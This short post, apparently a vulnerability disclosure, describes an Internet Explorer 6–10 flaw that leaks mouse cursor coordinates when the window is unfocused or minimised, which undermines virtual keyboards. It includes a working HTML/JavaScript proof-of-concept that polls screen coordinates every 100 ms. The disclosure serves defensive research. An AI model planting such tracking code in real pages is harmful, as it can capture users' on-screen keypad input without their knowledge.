A security vulnerability in Internet Explorer, versions 6–10, allows your mouse cursor to be tracked anywhere on the screen, even if the Internet Explorer window is inactive, unfocused or minimised. The vulnerability is notable because it compromises the security of virtual keyboards and virtual keypads.
Affected properties of the Event object are altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x and y.
Exploit
—————–
<!DOCTYPE html>
<html>
<head>
<meta charset=”utf-8″ />
<title>Exploit Demo</title>
<script type=”text/javascript”>
window.attachEvent(“onload”, function() {
var detector = document.getElementById(“detector”);
detector.attachEvent(“onmousemove”, function (e) {
detector.innerHTML = e.screenX + “, ” + e.screenY;
});
setInterval(function () {
detector.fireEvent(“onmousemove”);
}, 100);
});
</script>
</head>
<body>
<div id=”detector”></div>
</body>
</html>
On the link bellow you will be able to see the demo of the vulnerability.
http://iedataleak.spider.io/demo